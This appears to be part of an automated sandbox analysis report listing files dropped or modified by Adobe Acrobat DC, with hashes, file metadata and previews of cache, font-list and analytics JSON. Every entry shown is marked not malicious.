SHA-256:	576814B71E8A8E1456A6C58197ADD66F3D7B3D6169F5B40E055E8E721BA6447F
SHA-512:	F9A0AEE080CCB8CAC918BEFEBBF2FD0563A8114ED22CA12B5D446C330103428E5AC2F5124D221C5B9CB0C332D4874360EDF003C5D5552B6D4B81FC7DA2A98871
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13359129441081769","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":96479},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\a0668ec5-4e89-4b5a-9eda-c2985324fe74.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	474
Entropy (8bit):	4.966326216070153
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqZcOzsBdOg2HZZcaq3QYiubcP7E4T3y:Y2sRdsIUdMHO3QYhbA7nby
MD5:	DDCCAA79DAFA5C3BC978609B7F936D94
SHA1:	B19F2C8F152E7A6D0ABF6DC017D4FD776D5855D6
SHA-256:	576814B71E8A8E1456A6C58197ADD66F3D7B3D6169F5B40E055E8E721BA6447F
SHA-512:	F9A0AEE080CCB8CAC918BEFEBBF2FD0563A8114ED22CA12B5D446C330103428E5AC2F5124D221C5B9CB0C332D4874360EDF003C5D5552B6D4B81FC7DA2A98871
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13359129441081769","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":96479},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	5449
Entropy (8bit):	5.250901003496124
Encrypted:	false
SSDEEP:	96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7IvkHn:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhZ
MD5:	341A3BA2B07C175064DB340E74B0994D
SHA1:	0406C06188E79791952D88712A461CF9B2B71FEC
SHA-256:	0984894B3A5A0E510AEB5E58A8CFACE906FC1F438B862666C6CF95789FF621CA
SHA-512:	FB754591A532E2C6B359FC3A3CFCCE9411767AE2B1AFD8B52C26AF52EF5D3D9A69E14E38BA78E6639E781719E8961BC973337B8A0229C9B4F7C47CEF4429F3C9
Malicious:	false
Preview:	*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.129097275640353
Encrypted:	false
SSDEEP:	6:Dt1bsQ+q2PN72nKuAl9OmbzNMxIFUt86t1boVdWZmw+6t1b9pQVkwON72nKuAl9c:DfbZ+vVaHAa8jFUt86fbL/+6fbQV5Oav
MD5:	58DE1AE18458CF8B886EA8DA8912B9F0
SHA1:	3F886203F042D3FAC50043E5F7BBBA6A6F298883
SHA-256:	CBFC9C4BC573D44D98C289A98695582EF9602D0412E1354A04E24EA54762210E
SHA-512:	22807CDDFCC1F2476AD6360312E6E9D8498D3E5A48ACE687BFBCE833E4A7B6BFDBFBCEDBC36944A5C9338C8BCFF5FE0B74BF6E2935B084B84AE0777B382931A0
Malicious:	false
Preview:	2024/05/01-15:17:12.128 130c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/05/01-15:17:12.135 130c Recovering log #3.2024/05/01-15:17:12.145 130c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.129097275640353
Encrypted:	false
SSDEEP:	6:Dt1bsQ+q2PN72nKuAl9OmbzNMxIFUt86t1boVdWZmw+6t1b9pQVkwON72nKuAl9c:DfbZ+vVaHAa8jFUt86fbL/+6fbQV5Oav
MD5:	58DE1AE18458CF8B886EA8DA8912B9F0
SHA1:	3F886203F042D3FAC50043E5F7BBBA6A6F298883
SHA-256:	CBFC9C4BC573D44D98C289A98695582EF9602D0412E1354A04E24EA54762210E
SHA-512:	22807CDDFCC1F2476AD6360312E6E9D8498D3E5A48ACE687BFBCE833E4A7B6BFDBFBCEDBC36944A5C9338C8BCFF5FE0B74BF6E2935B084B84AE0777B382931A0
Malicious:	false
Preview:	2024/05/01-15:17:12.128 130c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/05/01-15:17:12.135 130c Recovering log #3.2024/05/01-15:17:12.145 130c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240501131714Z-178.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
Category:	dropped
Size (bytes):	65110
Entropy (8bit):	0.801499700567787
Encrypted:	false
SSDEEP:	48:xQBSr4+zPafvHiSa53Ez8cADHjtcvfpb8gA5pamCedAYMlG+T0qlkPXwBjqaOCAG:xCSrDynPa504LXiKp5AY6G+DkPvaO5dE
MD5:	4A3A446C3981FC8A66F8C62BC09995F4
SHA1:	932C324118118494DEA7DE3A72411824E8EB00C3
SHA-256:	2A018093DE5ABF4099D4A4B381F370992416B49CFA3368F7D726888A85843F0F
SHA-512:	E05B4E860BECC71D1FBAF639AF7CD92765378EDE5F3F28A8DECBC62EE0D2FC91A3468A6D361589456036EDD6717AA676DCEEDE5A28D88A9E584287BEFF5CD503
Malicious:	false
Preview:	BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.444652720683825
Encrypted:	false
SSDEEP:	384:ye6ci5thiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mys3OazzU89UTTgUL
MD5:	0744884C590BFC2C4FE9DEF645CB3B49
SHA1:	48C9159FEC26E6ADCD16FA92078ACE5B0146434D
SHA-256:	B34C379EC47E0A6EDDE35F419AE69E8A3DEB93C5AEBCBED75697B280B811EEBA
SHA-512:	E15B7C3B572C4538E8D19B4293D2609B11FB2D7E30C25A790A49E3300C12FD547E6794CA961FCB8C37F679B3D38AC820E2B14D8131F3CC4865788C0CACD420E2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.769135514854735
Encrypted:	false
SSDEEP:	48:7Mz2JioyV1ioyhoy1C7oy16oy1rKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1E:7RJu1j+XjBi3b9IVXEBodRBk0
MD5:	B123C1E1847CA51A08E811D03541412F
SHA1:	460B2B1EE523144BF836768F32BCD42BB4ACCF18
SHA-256:	865BC7C576EAFA1B20E1D89FC9AE7821B8EEBF2E5A015A64B5B0574282FE5FC7
SHA-512:	4F0B2FD64264D590BEECA10F8512A643BAB6D46494A8D229890091A9B611B2353E98BA204387DC28F71F56D217E13628EABC0C06E61A4B1B4B5A0640220703B8
Malicious:	false
Preview:	.... .c.......Y................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6424

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	185099
Entropy (8bit):	5.182478651346149
Encrypted:	false
SSDEEP:	1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
MD5:	94185C5850C26B3C6FC24ABC385CDA58
SHA1:	42F042285037B0C35BC4226D387F88C770AB5CAA
SHA-256:	1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
SHA-512:	652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	185099
Entropy (8bit):	5.182478651346149
Encrypted:	false
SSDEEP:	1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
MD5:	94185C5850C26B3C6FC24ABC385CDA58
SHA1:	42F042285037B0C35BC4226D387F88C770AB5CAA
SHA-256:	1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
SHA-512:	652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.336659996695048
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFUMn1mnZiQ0Y6doAvJM3g98kUwPeUkwRe9:YvXKXFU+oc+GMbLUkee9
MD5:	373FAE327D165ED7D8912EDB8919929E
SHA1:	16D356D115A8A64CBD4806243A4D3B1836B4CB16
SHA-256:	E303778ED89F5A483DFC9B498E35EBB09986369CE52F5AA48544D71D5EA6FF8E
SHA-512:	AD88AB462DC785B7A1E6E3745A0ED3EF1A8C2763284B15F3C73DC37DCD737C938D92638DDF662D28E0606A09FDA8049065194B02272521B3AAE84996E6DE9742
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.290406980929843
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFUMn1mnZiQ0Y6doAvJfBoTfXpnrPeUkwRe9:YvXKXFU+oc+GWTfXcUkee9
MD5:	A631FC1B6DDA71E5E42A5AB008E74A6D
SHA1:	FD020498AFD72CC8431F33E0B70D93DE3452E004
SHA-256:	59870697F74738C61B85E519D3435F162E2BCDC1E55E05F7D79FD68B35CD7560
SHA-512:	B3DAEC4F590A3B672AB4E9CA3BAC99F8C74939C0BECDCCE9503BFCCD955953F595710D0CDA240DF076697648D82B57EFF889FCE6E087C8EE1E4E07C581AA6C47
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.267572334775023
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFUMn1mnZiQ0Y6doAvJfBD2G6UpnrPeUkwRe9:YvXKXFU+oc+GR22cUkee9
MD5:	087595123FF5A301B89ED1D1A8B6C172
SHA1:	8AE66E3C1736AA14021D054F1936F5CD1F41D1AE
SHA-256:	82270A5272D1B66E6626039687E34A4FEFA57AC8472F1F4E936D9578A8ED81C7
SHA-512:	63FC4818F0B5F3B533FB2C616A3CC38149C2773A4EC5D1A3FAEB921938DD114BE870A929922DE316DABFE3915B1B5A639BC8A12D9099DEB4E9AD917A381A5B29
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.3157456113196115
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFUMn1mnZiQ0Y6doAvJfPmwrPeUkwRe9:YvXKXFU+oc+GH56Ukee9
MD5:	B38BF75DD0753D9A7BDD7195ACE39068
SHA1:	3423E6068F973EBE114E54953EB7961A701DDCE1
SHA-256:	5BF0FE1AC2997A6A8C13090BD6B776C9DC30EB171D7F6748C2310B738DCD3A8A
SHA-512:	25D7A8A4282F91E0369BE3CB9BE2A4443E6D771A930D821034D2ED40EAC29ADF5886A02A9C15127F24C44C43358596E7E12C2D3F5F36A47ACAE973C18A4AD168
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.284276478578375
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFUMn1mnZiQ0Y6doAvJfJWCtMdPeUkwRe9:YvXKXFU+oc+GBS8Ukee9
MD5:	93B00D90111F7458DF9159C973C63381
SHA1:	155236FBA76BD143E0B58F58B0FDB5A0A1720C49
SHA-256:	96F8013FFB886ED7B64BED32C77A0F04E6C70EBC57781F5CB99757E96EBA9DC6
SHA-512:	74E7EA4D551564F7CE4CB09BA8CA4E9DAF617F599C1394FE6AA74D20D9497A4086434A79D4021414E1D47972A6E09237917BFAD63B38235717CC2FFF8DE93267
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.266976124113666
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFUMn1mnZiQ0Y6doAvJf8dPeUkwRe9:YvXKXFU+oc+GU8Ukee9
MD5:	A4327CC4A780371223E982A4C4A4DB8C
SHA1:	D81E64D0DB6A975026BDE5C70DE6ED041FE330AA
SHA-256:	AF6CD9AF2E07375889B43FF8F81B30A97E220F0883650F0B9D869159CE5B153A
SHA-512:	84690C73209ED82058DBF917D3235F4CD607C4BF7A5B8F1D17CF07B08A26F1175A3685868F2F2228283E223961C0680C5EFF39A58AAA1E0AA9487420254198D8
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.270258462047963
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFUMn1mnZiQ0Y6doAvJfQ1rPeUkwRe9:YvXKXFU+oc+GY16Ukee9
MD5:	CDFE1F4422A972186309D1EF72FC4972
SHA1:	0BC0F9E58DF9E3BF1A4A61C4CBFB81A47D6B1B92
SHA-256:	D8CC054E1ED5DC7542EF31D73DC77CB82B3783292601F5BBA0E198E61E920EDE
SHA-512:	6BD57C440FF11CEFFBC2EC708630872D24E3085D92F03FD926ACC64DFBF002F985FD660DACDB40428B9D51809D8EC4A738EBDF8E6F42F1343D8A11D156DE30B8
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.278331595234535
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFUMn1mnZiQ0Y6doAvJfFldPeUkwRe9:YvXKXFU+oc+Gz8Ukee9
MD5:	8E25D9466E53CABF18F486C5531A3BA5
SHA1:	AED4BDE2BC3477DC2A4626EDB687AB86CD4F1417
SHA-256:	2B80FAEDA52EC85897AA6D0C40FDAC7A16951D528F5F8E0081B4FE7F539F8779
SHA-512:	A099065569A9C30AC8FFF6EB20C1C214F6966E94C3F43B91DCE288FD6689EE8153AC54D251F7936411F7CDD8838EE5B336C58CDADA490FBB1699E3071E4BA898
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1372
Entropy (8bit):	5.736631445780041
Encrypted:	false
SSDEEP:	24:Yv6Xn6KLgENRcbrZbq00iCCBrwJo++ns8ct4mFJNI:YvxEgigrNt0wSJn+ns8cvFJS
MD5:	3D8B4F55E3CBADFF4261914A33059226
SHA1:	89670AE5DBDA46CB2E7DCE08D62FE06FF013C921
SHA-256:	08621B85119ECBD4D7783A0F1F2D411BA828E6B5B41508ABFF169F24966A077F
SHA-512:	7294590517FF1AC6D80E898E422A966F5544E6B69D03B10DAF5AA0C5E47389000D6081D1E752FD5B5E55E4149EA6B9F239795106C2A38CCE7F89BF6B870D2062
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"79887_247329ActionBlock_0","campaignId":79887,"containerId":"1","controlGroupId":"","treatmentId":"acc56846-d570-4500-a26e-7f8cf2b4acad","variationId":"247329"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNSIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTMiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBwcmVtaXVtIFBERiBhbmQgZS1zaWduaW5nIHRvb2xzLiIsImJ

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.275925215091941
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFUMn1mnZiQ0Y6doAvJfYdPeUkwRe9:YvXKXFU+oc+Gg8Ukee9
MD5:	ADDAD0547A1189DDA6757D17D850E66C
SHA1:	685F9B7537E55999AD96EF162A5C7C9AF840D577
SHA-256:	EE6A21AB2B8C975C9CCE238A9318C62693BA74E2A2513359D38843C59BAEBBB6
SHA-512:	1C44858BAAB92970DE4CA58E1B1AAE4601AC4119A59B60BC01723F73FB09DB420BBF4D62B8F07F3FA2BE355B1E3E8485E12122EC4A0A8E9A7B53F3256F2D11F8
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1395
Entropy (8bit):	5.773810079958184
Encrypted:	false
SSDEEP:	24:Yv6XnprLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNg:Yv8HgDv3W2aYQfgB5OUupHrQ9FJe
MD5:	10FA92EDC3B795F36F4F18B717B642DB
SHA1:	F79C3BC86785FD72CFC01B16DC951592F4913E82
SHA-256:	D4A60CCCB5B820B1496D324092AA27B4923952141CCAF05720713D6B5075D37C
SHA-512:	8D158561BF6220E149D0F4D837F5D155DBE3C3C53F8C325B381799EECED3D4A3FD9AB7ABFED63F2ABC031E9B3FBFB2CFB0A27DA32F16E35DAB90083A3F332361
Malicious:	false
